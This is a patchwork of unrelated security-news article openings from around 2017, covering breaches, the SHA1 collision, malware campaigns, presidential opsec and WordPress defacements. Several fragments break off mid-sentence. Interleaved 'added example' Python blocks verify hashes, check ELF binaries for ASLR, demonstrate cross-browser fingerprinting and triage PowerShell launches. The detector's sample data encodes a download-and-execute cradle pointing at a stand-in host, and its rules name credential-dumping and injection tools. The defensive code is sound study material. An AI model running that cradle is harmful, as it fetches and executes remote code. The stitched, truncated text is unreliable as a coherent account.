Frank Abagnale is world-famous for pretending to be other people. The former teenage con-man, whose exploits 50 years ago became a Leonardo DiCaprio film called Catch Me If You Can, has built a lifelong career as a security consultant and advisor to the FBI and other law enforcement agencies. So it's perhaps ironic that four and a half years ago, his identity was stolen—along with those of 3.6 million other South Carolina taxpayers.
"When that occurred," Abagnale recounted to Ars, "I was at the FBI office in Phoenix. I got a call from [a reporter at] the local TV news station, who knew that my identity was stolen, and they wanted a comment. And I said, 'Before I make a comment, what did the State Tax Revenue Office say?' Well, they said they did nothing wrong. I said that would be absolutely literally impossible. All breaches happen because people make them happen, not because hackers do it. Every breach occurs because someone in that company did something they weren't supposed to do, or somebody in that company failed to do something they were supposed to do." As it turned out (as a Secret Service investigation determined), a government employee had taken home a laptop that shouldn't have left the office and connected it—unprotected—to the Internet.
Government breaches of personal information have become all too common, as demonstrated by the impact of the hacking of the Office of Management and Budget's personnel records two years ago. But another sort of organization is now in the crosshairs of criminals seeking identity data to sell to fraudsters: doctors' offices. Abagnale was in Orlando this week to speak to health IT professionals at the 2017 HIMSS Conference about the rising threat of identity theft through hacking medical records—a threat made possible largely because of the sometimes haphazard adoption of electronic medical records systems by health care providers.
For more than six years, the SHA1 cryptographic hash function underpinning Internet security has been at death's door. Now it's officially dead, thanks to the submission of the first known instance of a fatal exploit known as a "collision."
Despite more than a decade of warnings about the lack of security of SHA1, the watershed moment comes as the hash function remains widely used. Git, the world's most widely used system for managing software development among multiple people, relies on it for data integrity. The GnuPG e-mail encryption program still deems SHA1 safe. And hundreds if not thousands of big-name software packages rely on SHA1 signatures to ensure installation and update files distributed over the Internet haven't been maliciously altered.
A collision occurs when two different files or messages produce the same cryptographic hash. The most well-known collision occurred sometime around 2010 against the MD5 hash algorithm, which is even weaker than SHA1. A piece of nation-sponsored espionage malware known as Flame used the attack to hijack the Windows update mechanism Microsoft uses to distribute patches to hundreds of millions of customers. By forging the digital signature used to cryptographically prove the authenticity of Microsoft servers, Flame was able to spread from one infected computer to another inside targeted networks.
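The practical consequence of a collision attack is that a SHA1 (or MD5) digest on its own no longer proves that a downloaded file is the one the publisher hashed. The following is an added example, not code from the article or from any project it mentions: a download-verification routine that checks every published digest but only treats the file as trusted when at least one digest from an algorithm that still has collision resistance matches. The payload bytes and the `publish` helper are constructed for the example.

```python
import hashlib
import hmac
from typing import Dict, Iterable

# Algorithms whose collision resistance is broken in practice (MD5 for years, SHA-1 as of the
# first published collision). A matching digest from these proves nothing against an attacker
# who can choose both colliding files.
BROKEN_COLLISION_RESISTANCE = {"md5", "sha1"}


def publish(data: bytes, algorithms: Iterable[str]) -> Dict[str, str]:
    """Constructed stand-in for a publisher's release notes: hex digests per algorithm."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}


def verify_digests(data: bytes, expected: Dict[str, str]) -> Dict:
    """Check `data` against published digests and say which ones carry security weight.

    Returns a dict with:
      matched    - algorithms whose digest matched
      mismatched - algorithms whose digest did not match
      weak       - matched algorithms that are collision-broken (no integrity guarantee)
      trusted    - True only if a non-broken digest matched and nothing mismatched
    """
    matched, mismatched = [], []
    for algo, hexdigest in expected.items():
        actual = hashlib.new(algo, data).hexdigest()
        # Constant-time comparison so the position of a mismatch is not leaked via timing.
        if hmac.compare_digest(actual, hexdigest.lower()):
            matched.append(algo)
        else:
            mismatched.append(algo)
    weak = [a for a in matched if a in BROKEN_COLLISION_RESISTANCE]
    strong = [a for a in matched if a not in BROKEN_COLLISION_RESISTANCE]
    return {
        "matched": matched,
        "mismatched": mismatched,
        "weak": weak,
        "trusted": bool(strong) and not mismatched,
    }


# Constructed sample release file and a tampered copy of it.
PAYLOAD = b"example-installer-1.0.bin contents (constructed)"
TAMPERED = PAYLOAD + b"\x00malicious-appendix"


def demo() -> Dict[str, bool]:
    """Three verification outcomes a practitioner should expect from this policy."""
    sha1_only = publish(PAYLOAD, ["sha1"])
    both = publish(PAYLOAD, ["sha1", "sha256"])
    return {
        # Correct file, but the publisher only gave a SHA-1: matches, yet not trusted.
        "sha1_only_trusted": verify_digests(PAYLOAD, sha1_only)["trusted"],
        # Correct file with a SHA-256 alongside: trusted.
        "sha256_trusted": verify_digests(PAYLOAD, both)["trusted"],
        # Tampered file: every digest mismatches, so it is rejected outright.
        "tampered_trusted": verify_digests(TAMPERED, both)["trusted"],
    }


if __name__ == "__main__":
    print(demo())
```

The policy deliberately still computes the SHA1 digest and reports a mismatch, because a wrong SHA1 is evidence of tampering even though a matching one is not evidence of integrity.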
Some five months after Yahoo disclosed a security breach that exposed sensitive data for 500 million accounts, some of its systems remained compromised, according to a report published Tuesday. The report said that in light of the hacks, Verizon would knock $350 million off the price it would pay to acquire Yahoo's Internet business.
"A recent meeting between technical staff of the two companies revealed that some of Yahoo’s systems were compromised and might be difficult to integrate with Verizon’s AOL unit," The Wall Street Journal reported, citing unnamed people. Verizon remains concerned that the breaches may hamper user engagement and in the process make the assets less valuable. Yahoo responded by cutting $350 million from the original $4.83 billion price tag, bringing the deal value to about $4.48 billion. It wasn't clear precisely when the meeting occurred.
In a release issued jointly by Yahoo and Verizon, the companies said neither the breaches nor any losses arising from them will be taken into account in determining whether a "Business Material Adverse Effect" has occurred or whether certain closing conditions have been satisfied. In addition to the $350 million price cut, the companies agreed to split the costs of responding to the breaches.
Researchers have uncovered an advanced malware-based operation that siphoned more than 600 gigabytes from about 70 targets in a broad range of industries, including critical infrastructure, news media, and scientific research.
The operation uses malware to capture audio recordings of conversations, screen shots, documents, and passwords, according to a blog post published last week by security firm CyberX. Targets are initially infected using malicious Microsoft Word documents sent in phishing e-mails. Once compromised, infected machines upload the pilfered audio and data to Dropbox, where it's retrieved by the attackers. The researchers have dubbed the campaign Operation BugDrop because of its use of PC microphones to bug targets and send the audio and other data to Dropbox.
"Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources," the CyberX researchers wrote. "In particular, the operation requires a massive back-end infrastructure to store, decrypt, and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics."
Representative Ted Lieu, a congressman from Los Angeles County, California, led fourteen other House Democrats on Friday in urging the House Government Oversight Committee to investigate "troubling reports" of President Donald Trump's apparently poor security practices and the potential danger to national security posed by them—including his continued use of an unsecured Android device to post to Twitter, discussion of sensitive information (including nuclear strategy) in the restaurant at his Mar-A-Lago resort, and leaving classified material unlocked while visitors were in the Oval Office.
In a letter to Oversight Committee chairman Jason Chaffetz and ranking Democratic member Elijah Cummings, the fifteen representatives wrote:
Referring to the complex problem of cybersecurity, President Trump recently said in an interview, "I’m not sure you have the kind of security that you need." We fully agree—which is why we are writing to request that the House Oversight and Government Reform Committee hold a hearing into troubling reports that the President is jeopardizing national security by egregiously failing to implement commonsense security measures across the board, from using an insecure, consumer-grade Android smartphone to discussing nuclear strategy openly in a dining room at his Mar-a-Lago Club in Florida. Cybersecurity experts universally agree that an ordinary Android smartphone, which the President is reportedly using despite repeated warnings from the Secret Service, can be easily hacked.
Lieu and the other signatories of the letter expressed concern that Trump's Android device, "most likely the Samsung Galaxy S3," is particularly vulnerable to attack, and that someone could alter the information the President viewed on it—which could "have a huge impact on his beliefs and actions." They also feared that someone could gain control of his Twitter account, "causing disastrous consequences for global stability," or use it as a listening device to pick up sensitive conversations.
Someone calling themselves "Pro_Mast3r" managed to deface a server associated with President Donald Trump's presidential campaign fundraising on Sunday. The server, secure2.donaldjtrump.com, is behind Cloudflare's content management and security platform, and does not appear to be directly linked from the Trump Pence campaign's home page. But it does appear to be an actual Trump campaign server—its certificate is legitimate, but a reference to an image on another site is insecure, prompting a warning on Chrome and Firefox that the connection is not secure.
The page, now displaying an image of a man in a fedora, displays the following text:
Hacked By Pro_Mast3r ~
Nothing Is Impossible
Peace From Iraq
In a presentation at this week's RSA security conference in San Francisco, researchers from Kaspersky Labs revealed more bad news for the Internet of drivable things—connected cars. Malware researchers Victor Chebyshev and Mikhail Kuzin examined seven Android apps for connected vehicles and found that the apps were ripe for malicious exploitation. Six of the applications had unencrypted user credentials, and all of them had little in the way of protection against reverse-engineering or the insertion of malware into apps.
The security vulnerabilities of connected cars have been a hot topic at security conferences for the past few years—particularly after researchers Charlie Miller and Chris Valasek demonstrated that they could control many of the functions of a Jeep Grand Cherokee (including its brakes and steering) remotely through the vehicle's built-in cellular data connection. There have also been repeated demonstrations of vulnerabilities in how the mobile applications from various connected vehicle services connect to vehicles, such as Samy Kamkar's demonstration of intercepting data from the mobile app for GM's OnStar.
The vulnerabilities looked at by the Kaspersky researchers focused not on vehicle communication, but on the Android apps associated with the services and the potential for their credentials to be hijacked by malware if a car owner's smartphone is compromised. Chebyshev and Kuzin wrote:
Remember the USB Killer stick that indiscriminately and immediately fries about 95 percent of devices? Well, now the company has released a new version that is even more lethal! And you can also buy an adaptor pack, which lets you kill test devices with USB-C, Micro USB, and Lightning ports. Yay.
If you haven't heard of the USB Killer before, it's essentially a USB stick with a bunch of capacitors hidden within. When you plug it into a host device (a smartphone, a PC, an in-car or in-plane entertainment system), those capacitors charge up—and then a split second later, the stick dumps a huge surge of electricity into the host device, at least frying the port, but usually disabling the whole thing. For more information on its technical operation, read our original USB Killer explainer.
Yahoo has sent out another round of notifications to users, warning some that their accounts may have been breached as recently as last year. The accounts were affected by a flaw in Yahoo's mail service that allowed an attacker—most likely a "state actor," according to Yahoo—to use a forged "cookie" created by software stolen from within Yahoo's internal systems to gain access to user accounts without a password.
Yahoo informed some users in e-mails this week that "Based on the ongoing investigation, we believe a forged cookie may have been used in 2015 or 2016 to access your account." The messages are regarding possible breaches using the cookie vulnerability in 2014.
The Associated Press' Raphael Satter reports that a Yahoo spokesperson acknowledged the company was notifying users of the potential breach of their accounts, but would not disclose how many users were affected.
Two Republican members of Congress sent a formal letter Tuesday to the Environmental Protection Agency’s Office of the Inspector General, expressing concern that “approximately a dozen career EPA officials” are using the encrypted messaging app Signal to covertly plan strategy and may be running afoul of the Freedom of Information Act.
The open source app has gained renewed interest in the wake of the election of President Donald Trump.
As Ars has reported previously, all Signal messages and voice calls are end-to-end encrypted using the Signal Protocol, which has since been adopted by WhatsApp and other companies. However, unlike other messaging apps, Signal’s maker, Open Whisper Systems, makes a point of not keeping any data, encrypted or otherwise, about its users. (WhatsApp also does not retain chat history but allows for backups using third-party services, like iCloud, which allows for message history to be restored when users set up a new device. Signal does not allow messages to be stored with a third party.)
The letter was written by Rep. Lamar Smith (R-Texas) and Rep. Darin LaHood (R-Ill.), who are the chair of the Committee on Science, Space, and Technology and the chair of the subcommittee on Oversight, respectively.
The congressmen note that the EPA has previously examined employee use of text messages to conduct government business and found that only a minuscule fraction of those messages was retained under FOIA.
“Not only does this demonstrate the vast issues presented with using text messages to conduct official business, but raises additional concerns about using messaging applications to conduct official business, which make it virtually impossible for the EPA to preserve and retain the records created in this manner to abide by federal record-keeping requirements,” they concluded.
The two Republicans gave the agency until February 28 to respond.
The EPA OIG did not immediately respond to Ars’ request for comment.
UPDATE 5:49pm ET: Jennifer Kaplan, Deputy Assistant Inspector General for Congressional and Public Affairs, e-mailed: "In response to your inquiry below, the EPA OIG takes all congressional requests seriously. This request is under review by the Inspector General and his senior leadership team."
For a decade, every major operating system has relied on a technique known as address space layout randomization to provide a first line of defense against malware attacks. By randomizing the computer memory locations where application code and data are loaded, ASLR makes it hard for attackers to execute malicious payloads when exploiting buffer overflows and similar vulnerabilities. As a result, exploits cause a simple crash rather than a potentially catastrophic system compromise.
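ASLR can only move code whose load address is not fixed: on Linux, an executable built as position-independent (ELF type `ET_DYN`) gets a random base, while a classic `ET_EXEC` binary loads at its link-time address no matter what the kernel setting is. The following is an added example, not code from the article, that reads the ELF header to tell the two apart and reports the kernel's system-wide ASLR setting from `/proc/sys/kernel/randomize_va_space`. The sample headers are constructed in the block; the file-reading helpers are the example's own.

```python
import struct
from typing import Dict, Optional

ET_EXEC = 2  # fixed-address executable: the loader cannot relocate it, so ASLR does not apply
ET_DYN = 3   # position-independent executable (PIE) or shared object: base is randomized

ELF_MAGIC = b"\x7fELF"


def elf_type(header: bytes) -> Optional[int]:
    """Return e_type from an ELF header prefix, or None if the bytes are not ELF.

    Layout (identical for ELF32 and ELF64): bytes 0-3 magic, byte 5 EI_DATA (1 = little-
    endian, 2 = big-endian), bytes 16-17 e_type in the file's byte order.
    """
    if len(header) < 18 or header[:4] != ELF_MAGIC:
        return None
    ei_data = header[5]
    if ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    return struct.unpack(endian + "H", header[16:18])[0]


def is_pie(header: bytes) -> bool:
    """True when the loader will pick a random base for this image.

    Caveat: shared libraries are also ET_DYN, so for a .so this reports True as well;
    the header alone does not distinguish a PIE executable from a library.
    """
    return elf_type(header) == ET_DYN


def check_binary(path: str) -> Dict[str, Optional[bool]]:
    """Read the first 64 bytes of a file on disk and classify it (helper for real use)."""
    with open(path, "rb") as fh:
        header = fh.read(64)
    kind = elf_type(header)
    return {"is_elf": kind is not None, "pie": kind == ET_DYN, "fixed_address": kind == ET_EXEC}


def aslr_level() -> Optional[int]:
    """Kernel-wide setting: 0 = off, 1 = stack/mmap/vdso randomized, 2 = also brk (full).

    Returns None on systems without the procfs knob (non-Linux, or restricted containers).
    """
    try:
        with open("/proc/sys/kernel/randomize_va_space") as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def make_header(e_type: int, little_endian: bool = True, elf64: bool = True) -> bytes:
    """Constructed minimal ELF identification block plus e_type/e_machine for the demo."""
    ident = ELF_MAGIC + bytes([2 if elf64 else 1, 1 if little_endian else 2, 1, 0, 0]) + b"\x00" * 7
    endian = "<" if little_endian else ">"
    return ident + struct.pack(endian + "HH", e_type, 0x3E)  # 0x3E = x86-64 machine id


if __name__ == "__main__":
    for label, hdr in (("pie", make_header(ET_DYN)), ("fixed", make_header(ET_EXEC))):
        print(label, "randomized base:", is_pie(hdr))
    print("kernel randomize_va_space:", aslr_level())
```

Both checks matter together: a PIE binary on a host with `randomize_va_space` set to 0 gets no randomization, and a non-PIE binary on a fully randomized host still loads its main image at a predictable address.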
APT28, the Russian hacking group tied to last year's interference in the 2016 presidential election, has long been known for its advanced arsenal of tools for penetrating Windows, iOS, Android, and Linux devices. Now, researchers have uncovered an equally sophisticated malware package the group used to compromise Macs.
Like its counterparts for other platforms, the Mac version of Xagent is a modular backdoor that can be customized to meet the objectives of a given intrusion, researchers from antivirus provider Bitdefender reported in a blog post published Tuesday. Capabilities include logging passwords, snapping pictures of screen displays, and stealing iOS backups stored on the compromised Mac.
The discovery builds on the already considerable number of tools attributed to APT28, which other researchers call Sofacy, Sednit, Fancy Bear, and Pawn Storm. According to researchers at CrowdStrike and other security firms, APT28 has been operating since at least 2007 and is closely tied to the Russian government. An analysis Bitdefender published last year determined APT28 members spoke Russian, worked mostly during Russian business hours, and pursued targets located in Ukraine, Spain, Russia, Romania, the US, and Canada.
Over the course of the last year, a number of human rights organizations, labor unions, and journalists were targeted in a "phishing" campaign that attempted to steal the Google credentials of targets by luring them into viewing documents online. The campaign, uncovered by Amnesty International, is interesting largely because of the extent to which whoever was behind the attack used social media to create a complete persona behind the messages—a fictional rights activist named Safeena Malik.
Malik translates from Arabic as "King," so Amnesty International refers to the spear-phishing campaign in a report posted to Medium today as "Operation Kingphish."
The party or parties behind the operation created Facebook, Google, LinkedIn, and Twitter profiles for "Safeena Malik" using a young woman's photos, which were apparently harvested from another social media account. "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile," wrote Nex, a security researcher working with Amnesty International, "along with a professional biography also stolen from yet another person."
Researchers have recently developed the first reliable technique for websites to track visitors even when they use two or more different browsers. This shatters a key defense against sites that identify visitors based on the digital fingerprint their browsers leave behind.
State-of-the-art fingerprinting techniques are highly effective at identifying users when they use browsers with default or commonly used settings. For instance, the Electronic Frontier Foundation's privacy tool, known as Panopticlick, found that only one in about 77,691 browsers had the same characteristics as the one commonly used by this reporter. Such fingerprints are the result of specific settings and customizations found in a specific browser installation, including the list of plugins, the selected time zone, whether a "do not track" option is turned on, and whether an adblocker is being used.
Until now, however, the tracking has been limited to a single browser. This constraint made it infeasible to tie, say, the fingerprint left behind by a Firefox browser to the fingerprint from a Chrome or Edge installation running on the same machine. The new technique—outlined in a research paper titled (Cross-)Browser Fingerprinting via OS and Hardware Level Features—not only works across multiple browsers, it's also more accurate than previous single-browser fingerprinting.
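The "one in 77,691" figure above is a measure of anonymity-set size, and the cross-browser result amounts to fingerprinting on attributes that come from the OS and hardware rather than from the browser installation. The following is an added example, not code from the article or the paper, that makes both ideas concrete: it converts an anonymity-set size into bits of identifying information and, over a constructed population of visitor records, shows how two browsers on the same machine fall into different browser-level sets but the same OS/hardware-level set. The attribute names and visitor records are constructed for the example.

```python
import math
from collections import Counter
from typing import Dict, List, Sequence, Tuple

# Attribute groups, constructed for this example; real fingerprint scripts collect far more.
BROWSER_LEVEL = ("user_agent", "plugins", "do_not_track", "adblock")
OS_HW_LEVEL = ("timezone", "screen", "cpu_cores", "gpu_renderer", "fonts_installed")


def surprisal_bits(matching: int, population: int) -> float:
    """Identifying information in a fingerprint shared by `matching` of `population` visitors.

    A fingerprint unique among 77,691 browsers carries log2(77691) ~ 16.2 bits.
    """
    return math.log2(population / matching)


def fingerprint(record: Dict[str, str], keys: Sequence[str]) -> Tuple[str, ...]:
    return tuple(record[k] for k in keys)


def anonymity_sets(records: List[Dict[str, str]], keys: Sequence[str]) -> Counter:
    """How many visitors share each fingerprint value under the chosen attribute set."""
    return Counter(fingerprint(r, keys) for r in records)


def identifiability(records: List[Dict[str, str]], keys: Sequence[str], target: Dict[str, str]) -> Dict:
    sets = anonymity_sets(records, keys)
    size = sets[fingerprint(target, keys)]
    return {"anonymity_set": size, "bits": surprisal_bits(size, len(records))}


def same_machine(a: Dict[str, str], b: Dict[str, str]) -> bool:
    """The cross-browser linkage: equal OS/hardware-level attributes despite differing browsers."""
    return fingerprint(a, OS_HW_LEVEL) == fingerprint(b, OS_HW_LEVEL)


def _visitor(vid, ua, plugins, dnt, adblock, tz, screen, cores, gpu, fonts):
    return {"id": vid, "user_agent": ua, "plugins": plugins, "do_not_track": dnt, "adblock": adblock,
            "timezone": tz, "screen": screen, "cpu_cores": cores, "gpu_renderer": gpu, "fonts_installed": fonts}


# Constructed population: alice runs Firefox and Chrome on one machine; bob and carol share
# alice's Chrome configuration but sit on different hardware; dave is unique on every axis.
VISITORS = [
    _visitor("alice-firefox", "Firefox/51", "none", "1", "yes", "UTC-5", "2560x1440", "8", "GPU-A", "set1"),
    _visitor("alice-chrome", "Chrome/56", "pdf,flash", "0", "no", "UTC-5", "2560x1440", "8", "GPU-A", "set1"),
    _visitor("bob-chrome", "Chrome/56", "pdf,flash", "0", "no", "UTC-5", "1920x1080", "4", "GPU-B", "set2"),
    _visitor("carol-chrome", "Chrome/56", "pdf,flash", "0", "no", "UTC+1", "1920x1080", "4", "GPU-C", "set2"),
    _visitor("dave-edge", "Edge/14", "none", "0", "no", "UTC-8", "1366x768", "2", "GPU-D", "set3"),
]


if __name__ == "__main__":
    print("unique among 77,691:", round(surprisal_bits(1, 77691), 2), "bits")
    for keys, label in ((BROWSER_LEVEL, "browser-level"), (OS_HW_LEVEL, "os/hw-level")):
        print(label, {v["id"]: identifiability(VISITORS, keys, v)["anonymity_set"] for v in VISITORS})
    print("alice's two browsers linked:", same_machine(VISITORS[0], VISITORS[1]))
```

The defensive reading of the numbers is that reducing browser-level entropy (fewer plugins, default settings) does not help against attributes the browser merely relays from the OS and GPU; countermeasures have to target those surfaces, which is what the paper's result implies.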
This weekend, as news of a ballistic missile launch by the Democratic People's Republic of Korea (North Korea) reached President Donald Trump and Japanese Prime Minister Shinzo Abe, President Trump got on his phone, and Abe consulted with staff. This didn't happen behind closed doors, however; it took place as members of Trump's Mar-A-Lago Club watched on in the resort's dining room. One club member even posed for photos with Trump's aide-de-camp—the Air Force major carrying the president's "nuclear football"—and posted pics of the scrum around Trump's table on Facebook.
Trump is comfortable conducting business over a meal. Last month, Trump approved a raid by US Navy SEALs in Yemen on an Al Qaeda compound not after a briefing in the White House situation room but rather over dinner with senior officials. These and other details of how the new president and his administration operate suggest that despite hitting Hillary Clinton hard for her security foibles, the Trump White House is not big on operational security (opsec).
President Trump may not be making phone calls on his old, vulnerable Android device, but he keeps it close at hand. His Twitter metadata shows that he regularly posts from his Samsung phone. And we know he's using an unsecured Android device because the secure one he's been issued wouldn't even allow Twitter to be installed.
Attacks on websites running an outdated version of WordPress are increasing at a viral rate. Almost 2 million pages have been defaced since a serious vulnerability in the content management system came to light nine days ago. The figure represents a 26 percent spike in the past 24 hours.
A rogues' gallery of sites has been hit by the defacements. They include conservative commentator Glenn Beck's glennbeck.com, Linux distributor Suse's news.opensuse.org, the US Department of Energy-supported jcesr.org, the Utah Office of Tourism's travel.utah.gov, and many more. At least 19 separate campaigns are participating and, in many cases, competing against each other in the defacements. Virtually all of the vandalism is being carried out by exploiting a severe vulnerability WordPress fixed in WordPress version 4.7.2, which was released on January 26. In an attempt to curb attacks before automatic updates installed the patch, the severity of the bug—which resides in a programming interface known as REST—wasn't disclosed until February 1.
Encrypted connections established by at least 949 of the top 1 million websites are leaking potentially sensitive data because of a recently discovered software vulnerability in appliances that stabilize and secure Internet traffic, a security researcher said Thursday.
The bug resides in a wide range of firewalls and load balancers marketed under the F5 BIG-IP name. By sending specially crafted packets to vulnerable sites, an attacker can obtain small chunks of data residing in the memory of connected Web servers. The risk is that by stringing together enough requests, an attacker could obtain cryptographic keys or other secrets used to secure HTTPS sessions end users have established with the sites, security researcher Filippo Valsorda told Ars. He didn't identify the sites that tested positive in his scans, but results returned by a publicly available tool included with his vulnerability disclosure included the following:
Update: A little more than three hours after this post went live, a representative with Appnexus said its adnx.com domain was no longer vulnerable. A day later, officials with MercadoLibre and clarin.com said F5 appliances for their networks were also fixed.
Malicious Microsoft Word documents that abuse macros have long been the bane of Windows users. Now, security researchers have found what may be the first such real-world attack to infect Macs.
The attack was found in a Word file titled "U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace." When Mac users open the document in a Word application configured to allow macros and ignore a warning, an embedded macro automatically:
- checks to make sure the LittleSnitch security firewall isn't running
- downloads an encrypted payload from hxxps://www.securitychecking.org:443/index.asp
- decrypts the payload using a hard-coded key and
- executes the payload
The code contained in the macro is written in the Python programming language. It was taken almost verbatim from EmPyre, an open-source exploit framework for Macs. By the time the researchers found the booby-trapped document, securitychecking.org was no longer serving the payload, so it wasn't possible to know precisely what it did. But the EmPyre component the macro borrowed allowed for persistent infections that contained a wide range of capabilities, including monitoring webcams, stealing passwords and encryption keys stored in the keychain, and accessing browsing histories.
White House Press Secretary Sean Spicer has gotten a lot of grief from some quarters for a variety of reasons. Among them are his problems with information security—including his apparent posting of passwords to his Twitter account. But the latest privacy problem Spicer has on the Internet is one that thousands of others who have embraced the Internet have had, and it's mostly the fault of the Internet's archaic address book associated with the Domain Name System: a little thing we call WHOIS.
In 2009, Spicer registered a domain for his personal blog—seanspicer.com. He updated his domain registration data in March of 2010, apparently after moving into his home in Alexandria, Virginia. And when he did, he used his own personal home address, phone number, and e-mail account. That information, as Mashable reported on February 6, is still publicly accessible through a whois lookup against the Domain Name Service, as published by his domain registrar GoDaddy. The phone number matches one associated with Spicer present in the DNC e-mail breach posted by WikiLeaks.
Spicer's Yahoo e-mail account—which was part of data exposed in the MySpace, Dropbox and LinkedIn "mega-breaches" discovered in 2016—is also associated with a number of other domains, including those bearing the name of family members. These sites have largely been taken down (as in the case of theelephanttrunk.org, a Republican-themed online tie store), are still essentially blank template sites (including stateoftherace.org), or are parked. The parked domains include:
Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran’s nuclear program.
Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.
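Because the in-memory tooling described above rides on legitimate binaries, the detection opportunity is in how those binaries are launched rather than in a file on disk. The following is an added example, not code from Kaspersky or the article: a small triage rule set run over constructed process-creation events that decodes PowerShell's `-EncodedCommand` argument (base64 of UTF-16LE text) and scores launches for an encoded payload, an in-memory download cradle, a known credential or injection tool name, an Office parent process, and a hidden window. The event format, the sample events, the weights and the threshold are the example's own choices.

```python
import base64
import re
from typing import Dict, List, Optional

# Rule weights, constructed for this example; tune against your own baseline.
WEIGHTS = {
    "encoded command": 1,
    "download/in-memory execution cradle": 2,
    "credential/injection tool name": 3,
    "spawned by Office application": 2,
    "hidden window": 1,
}
ALERT_THRESHOLD = 3

ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient|frombase64string",
                    re.IGNORECASE)
TOOLS = re.compile(r"mimikatz|meterpreter|invoke-shellcode|reflectivepeinjection", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def make_encoded(script: str) -> str:
    """PowerShell expects -EncodedCommand as base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext script from an encoded PowerShell command line, if any."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: str) -> Dict:
    """Score one event. Fields: timestamp|host|parent image|image|command line (constructed layout)."""
    ts, host, parent, image, cmdline = event.split("|", 4)
    result = {"time": ts, "host": host, "parent": parent, "image": image, "reasons": [], "score": 0, "decoded": None}
    if image.lower() != "powershell.exe":
        return result
    decoded = decode_encoded_command(cmdline)
    result["decoded"] = decoded
    text = cmdline + (" " + decoded if decoded else "")  # inspect the decoded script too
    if decoded is not None:
        result["reasons"].append("encoded command")
    if CRADLE.search(text):
        result["reasons"].append("download/in-memory execution cradle")
    if TOOLS.search(text):
        result["reasons"].append("credential/injection tool name")
    if parent.lower() in OFFICE_PARENTS:
        result["reasons"].append("spawned by Office application")
    if HIDDEN.search(text):
        result["reasons"].append("hidden window")
    result["score"] = sum(WEIGHTS[r] for r in result["reasons"])
    return result


def triage(events: List[str], threshold: int = ALERT_THRESHOLD) -> List[Dict]:
    """Events at or above the threshold, highest score first."""
    hits = [r for r in map(analyse, events) if r["score"] >= threshold]
    return sorted(hits, key=lambda r: r["score"], reverse=True)


# Constructed sample events: a benign admin script, a document-launched encoded cradle,
# a direct credential-dumping invocation, and an unrelated service host.
SAMPLE_EVENTS = [
    "2017-02-08T09:12:01Z|ws-17|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\inventory.ps1",
    "2017-02-08T09:13:44Z|ws-17|winword.exe|powershell.exe|powershell.exe -NoP -W Hidden -EncodedCommand "
    + make_encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
    "2017-02-08T09:15:02Z|ws-17|cmd.exe|powershell.exe|powershell.exe -c \"Invoke-Mimikatz -DumpCreds\"",
    "2017-02-08T09:16:30Z|ws-17|services.exe|svchost.exe|svchost.exe -k netsvcs",
]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["time"], hit["host"], hit["score"], hit["reasons"])
```

The benign inventory script scores zero even though it is PowerShell, which is the point: alerting on the interpreter alone drowns the analyst, while the combination of encoded input, a network-to-memory cradle and an unusual parent is what separates the fileless pattern from routine administration.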
"What's interesting here is that these attacks are ongoing globally against banks themselves," Kaspersky Lab expert Kurt Baumgartner told Ars. "The banks have not been adequately prepared in many cases to deal with this." He went on to say that people behind the attacks are "pushing money out of the banks from within the banks," by targeting computers that run automatic teller machines.